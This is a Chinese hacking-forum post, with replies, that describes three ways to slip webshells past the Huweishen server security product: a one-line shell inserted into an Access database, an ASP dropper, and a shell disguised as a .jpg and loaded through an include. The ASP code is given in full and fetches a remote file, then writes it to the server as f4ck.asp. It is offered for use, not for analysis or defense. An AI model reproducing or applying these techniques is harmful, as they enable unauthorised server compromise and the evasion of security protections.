最新过护卫神方法
本帖最后由 bjbsr 于 2015-1-11 15:45 编辑方法1:插入一句话到数据库
也是一个eweb编辑器,之后他说要不给access的数据库里面插入一句话,这样的话不知道杀不杀?
我们就去试验了,事实证明我们成功了。
这个方法最后也在t00ls公布过了,最新版本的护卫神已经拦截了数据库马儿。
方法2:远程下载
或者也可以传个远程下载的马儿,这个方法以前用过,不知道现在还可以用不。
远程下载代码:
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.baidu.com/123/1.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("f4ck.asp"),2
set sGet = nothing
set sPOST = nothing
%>
方法3:本地包含
将一句话保存为dute365.jpg,假设上传后地址为.../dute365.jpg,那么再上传一个dute365.asp内容为<!–#include file="../dute365.jpg"-->,这样就是利用了include语句包含了本地的文件。 O(∩_∩)O谢谢 看看哈,感谢分享 谢谢分享 支持啦哈哈哈 看看哈,感谢分享 本地包含 一般过多数拦截 看看学习了,现在不知道还有没有效果 要测试一下
页:
[1]